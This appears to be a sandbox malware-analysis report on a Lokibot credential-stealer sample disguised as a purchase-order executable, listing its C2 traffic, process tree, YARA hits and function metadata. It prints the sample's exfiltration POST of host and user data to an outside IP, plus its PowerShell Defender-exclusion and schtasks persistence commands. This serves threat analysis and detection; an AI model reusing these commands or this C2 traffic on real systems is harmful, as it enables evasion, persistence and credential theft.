Aug 29, 2024 12:04:47.124373913 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:04:47.124387026 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49767	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:04:47.290076971 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:04:47.295064926 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:04:49.551826000 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:04:47 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:04:49.551848888 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:04:49.551867008 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Target ID:	0
Start time:	06:02:41
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-0Y9005373R664.exe"
Imagebase:	0x6c0000
File size:	606'216 bytes
MD5 hash:	8C71713FD5663BCBE87118FC47DE3EC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:02:46
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"
Imagebase:	0x100000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:02:46
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:02:47
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
Imagebase:	0x100000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:02:47
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:02:47
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"
Imagebase:	0x700000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:02:47
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:02:47
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\PO-0Y9005373R664.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-0Y9005373R664.exe"
Imagebase:	0xd70000
File size:	606'216 bytes
MD5 hash:	8C71713FD5663BCBE87118FC47DE3EC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	06:02:49
Start date:	29/08/2024
Path:	C:\Users\user\AppData\Roaming\VvtddClQv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\VvtddClQv.exe
Imagebase:	0x3f0000
File size:	606'216 bytes
MD5 hash:	8C71713FD5663BCBE87118FC47DE3EC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs Detection: 59%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:02:50
Start date:	29/08/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:02:55
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"
Imagebase:	0x700000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:02:55
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:02:55
Start date:	29/08/2024
Path:	C:\Users\user\AppData\Roaming\VvtddClQv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VvtddClQv.exe"
Imagebase:	0xa50000
File size:	606'216 bytes
MD5 hash:	8C71713FD5663BCBE87118FC47DE3EC5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	10

Executed Functions

Function 04F94490 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04F9451E
GetCurrentThread.KERNEL32 ref: 04F9455B
GetCurrentProcess.KERNEL32 ref: 04F94598
GetCurrentThreadId.KERNEL32 ref: 04F945F1

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3cb7a7c0f23376ad777a489cecb37e74f6762a45d1c9dc3b6d85e122da710ba9
Instruction ID: b26456d7381a38d1bd2107dc552e0d5ce49653eb86f45e4af05fb865078c1b88
Opcode Fuzzy Hash: 3cb7a7c0f23376ad777a489cecb37e74f6762a45d1c9dc3b6d85e122da710ba9
Instruction Fuzzy Hash: 37516AB4900649CFEB54DFA9D548BDEBBF1EF88304F248459E409A7350DB34A946CF26

Function 04F944A0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04F9451E
GetCurrentThread.KERNEL32 ref: 04F9455B
GetCurrentProcess.KERNEL32 ref: 04F94598
GetCurrentThreadId.KERNEL32 ref: 04F945F1

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dc7076f8888c14db0b16715d68f7c9d69c18c599c829e85a0a880e4efafa58bf
Instruction ID: 1c0c3b02a8d798a19535209de0d0f6745aa449c2442fc9f31bca0376a687a068
Opcode Fuzzy Hash: dc7076f8888c14db0b16715d68f7c9d69c18c599c829e85a0a880e4efafa58bf
Instruction Fuzzy Hash: 585177B4900709CFEB54DFAAE548B9EBBF1EF88314F208459E409A7350DB34A945CF66

Function 04F91E08 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 04F9205E

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6a4ea20bc3baadb074959fac42f31937ff6af3b67e8d62a7b7a3454f5a0948e8
Instruction ID: b0eb443ae3dde067cc945168cd16ccaf1f2fbe284b237424d463057175a85c09
Opcode Fuzzy Hash: 6a4ea20bc3baadb074959fac42f31937ff6af3b67e8d62a7b7a3454f5a0948e8
Instruction Fuzzy Hash: FC714670A00B069FEB24DF29D54475ABBF5FF88304F008A29D45AD7A50DB74F946CB90

Function 04F98850 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F98962

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5b9b2b1419d23db7c23b99b58ed0a7676b8dcc10c606a8e84f86b292fd7666fa
Instruction ID: d4d63ac8cf9d8629665c68efaa74fc159714ba2cecdfb4ffcf9ca85172ea8f4b
Opcode Fuzzy Hash: 5b9b2b1419d23db7c23b99b58ed0a7676b8dcc10c606a8e84f86b292fd7666fa
Instruction Fuzzy Hash: 7B41C0B1D10349DFEB14CF99C884ADEBBF5BF48750F24812AE818AB210D775A845CF91

Function 04F98844 Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F98962

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 839f9ff791f7ca9ca84290e54ae492dcaaa8b58ed8d8270f8e823467866bcc2f
Instruction ID: 3e86d8436470a8e4316bdd6c41c92e32617dca8c537a0941463ed19aaf8884ee
Opcode Fuzzy Hash: 839f9ff791f7ca9ca84290e54ae492dcaaa8b58ed8d8270f8e823467866bcc2f
Instruction Fuzzy Hash: 6051D0B5D10349DFEB14CF99C880ADEBBF1BF48350F24812AE819AB210D775A845CF91

Function 010D632C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010D63E9

Memory Dump Source

Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 003e09527b9e922b5fc02de18059f9ea4dd5712f110c2714389e543712d91bd5
Instruction ID: 199fd085cd9d2c7d10fbc4c5ea7f9b8bd606e52f911f8aba7e00322f64216e8c
Opcode Fuzzy Hash: 003e09527b9e922b5fc02de18059f9ea4dd5712f110c2714389e543712d91bd5
Instruction Fuzzy Hash: FC41B0B0C00719CBEB24CFA9C844BCEBBF5BF89704F20816AD448AB251DB766946CF50

Function 04F96334 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04F9B071

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 8299e2a450c0ee92f6d8617ba0f487b55e77abb77b4e2262b436669c9872041d
Instruction ID: 575ab11effa2b32f55e62c0940c3df4025c9c6de2c7c7da360f657d785cd6ce1
Opcode Fuzzy Hash: 8299e2a450c0ee92f6d8617ba0f487b55e77abb77b4e2262b436669c9872041d
Instruction Fuzzy Hash: A8415BB5A00309DFEB14CF99D448BAABBF5FB88314F148459D519AB321D735B842CFA1

Function 010D4E8C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010D63E9

Memory Dump Source

Source File: 00000000.00000002.1744446969.00000000010D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10d0000_PO-0Y9005373R664.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5bdcbc425e29c113ca373dc0046ff031ce30a187d44376f8b85475f9faa637c7
Instruction ID: 0205f6bec6927366e8a1eb13ff1be9b423e079cf0e03336b0136939c08a1050c
Opcode Fuzzy Hash: 5bdcbc425e29c113ca373dc0046ff031ce30a187d44376f8b85475f9faa637c7
Instruction Fuzzy Hash: B841B270C00719CFEB24DFA9C844B9EBBF5BF89704F20816AD448AB251DB766946CF91

Function 04F946E0 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04F9476F

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0a4b1fe3327bf07bd12a1e5fcec9d3a9097295ebe04483e7c3e928c607cb58d3
Instruction ID: 3a9bc4bf00d81e5c10432527c9e4e045652eb753f398533b4d8896d053c0dcfc
Opcode Fuzzy Hash: 0a4b1fe3327bf07bd12a1e5fcec9d3a9097295ebe04483e7c3e928c607cb58d3
Instruction Fuzzy Hash: 2421F2B9900348DFEB10CFA9D984ADEBFF5EB48310F24805AE954A7350D378A945CF65

Function 04F946E8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04F9476F

Memory Dump Source

Source File: 00000000.00000002.1755091356.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_PO-0Y9005373R664.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c0f29d4075877c45333cb5bb17a5f62a1050cdb0b000698bdd7169ed9293c22a
Instruction ID: 0140571669ab69d8b214e7bea45054451593d8624063718709df21264d9ebd86
